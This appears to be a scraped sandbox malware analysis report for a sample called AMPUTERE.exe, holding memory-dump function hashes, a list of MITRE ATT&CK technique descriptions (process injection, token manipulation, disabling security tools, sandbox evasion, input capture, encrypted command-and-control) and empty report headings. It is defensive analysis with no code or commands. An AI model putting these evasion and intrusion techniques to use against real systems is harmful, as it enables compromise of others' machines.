Instruction Fuzzy Hash: FE51D6B0E48787CEDB2F9E2C89947997AD29F13360F49C399C8964B1D7D3A58096C312

Uniqueness

Uniqueness Score: -1.00%

Function 01103200, Relevance: .0, Instructions: 42libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 64d487ac3274aec726d6c7a13eb79cf75070240f60a1d8bd71cb41c9290c3379
Instruction ID: 7095e54a2b0cafc5abee926b6b68cd0863fdaff1e4bf19b2b412abd7179d285c
Opcode Fuzzy Hash: 64d487ac3274aec726d6c7a13eb79cf75070240f60a1d8bd71cb41c9290c3379
Instruction Fuzzy Hash: 02F059727147C74FEB2E992889F1348A997FB8A110F0546BAC112CF192D7A8D982C210

Uniqueness

Uniqueness Score: -1.00%

Function 01103317, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c723584da33129d9aef128a4010865fb209565f57640c4741598f97f9b3d01
Instruction ID: e3a2b4b1a75a64771e35754375e0ad8de7377f5a6a230c060a9fce7ed91fcc9b
Opcode Fuzzy Hash: 42c723584da33129d9aef128a4010865fb209565f57640c4741598f97f9b3d01
Instruction Fuzzy Hash: 79E0927AF2E603EDEB1F10554AAA3A901477BC2130EA6813D4D660A3C6EFD985469001

Uniqueness

Uniqueness Score: -1.00%

Function 01106089, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc616ff41bad9f6c30e0fbaa6708797c1b20e63f3f75dcb232e3676f212d4c1
Instruction ID: a324ce5530352bc5d1126dc302770c418cec426837c327644b0fe914e84f5e5f
Opcode Fuzzy Hash: 3fc616ff41bad9f6c30e0fbaa6708797c1b20e63f3f75dcb232e3676f212d4c1
Instruction Fuzzy Hash: 82F0BE75B002418FCA0EDA28C5D0F6673B56BA5650F52849AE901C72E3CBB0E861CA22

Uniqueness

Uniqueness Score: -1.00%

Function 011032A2, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ab6d86e0fbfa6f42d10775d03fdb728d45f7d6078fa2f9c5596ca31b57f2fe
Instruction ID: b88fa725c6a9c8144812ed857784a793452ef058a6e567864607ecd80ff6d859
Opcode Fuzzy Hash: 31ab6d86e0fbfa6f42d10775d03fdb728d45f7d6078fa2f9c5596ca31b57f2fe
Instruction Fuzzy Hash: F1C01279A68259BED52F040462853F0564A7B0B260DA2811528AB571C596CE8A8E9007

Uniqueness

Uniqueness Score: -1.00%

Function 011031DF, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981db43a8df08db4fcc78fa851d91ee33c12f7fca2ad50657d0be3865e81f2e2
Instruction ID: 9dc30eb0ee7d5172e427642d28b5d91df513c07b098d308c594bc1fb50ba5956
Opcode Fuzzy Hash: 981db43a8df08db4fcc78fa851d91ee33c12f7fca2ad50657d0be3865e81f2e2
Instruction Fuzzy Hash: 5FC04CBA2116829FFF05DA49C491B4273A5FB55648B4804A0D412CBB11C754E9008600

Uniqueness

Uniqueness Score: -1.00%

Function 01105733, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d472c806a6017d5c2692e74f2ef21591ca13a4fa09df2bc4fc17d6f6097136
Instruction ID: 3caac6c62a807abfee13c521d89733d2676fea3f18d223ee8b8e6643f9303c39
Opcode Fuzzy Hash: e5d472c806a6017d5c2692e74f2ef21591ca13a4fa09df2bc4fc17d6f6097136
Instruction Fuzzy Hash: ABB09230610A80CFCA8ACE09C280F4073B1BB04A80F424880E8018BA61C3A4E800CA00

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report AMPUTERE.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Function 00409A2C, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 824
memoryCOMMONCrypto

Function 00409A2A, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 791
memoryCOMMONCrypto

Function 00409ABB, Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 783
memoryCOMMONCrypto

Function 0040EE69, Relevance: 416.4, APIs: 198, Strings: 39, Instructions: 1646
COMMON

Function 00410C51, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 169
COMMON

Function 0040EB44, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 224
COMMON

Function 004016FC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Function 00411BD8, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 186
COMMON

Function 00410EC6, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 155
COMMON

Function 004112FA, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 197
COMMON

Function 004115D9, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 127
COMMON

Function 004110F7, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 140
COMMON

Function 00411ABD, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 69
COMMON

Function 004117D9, Relevance: 25.7, APIs: 17, Instructions: 180
COMMON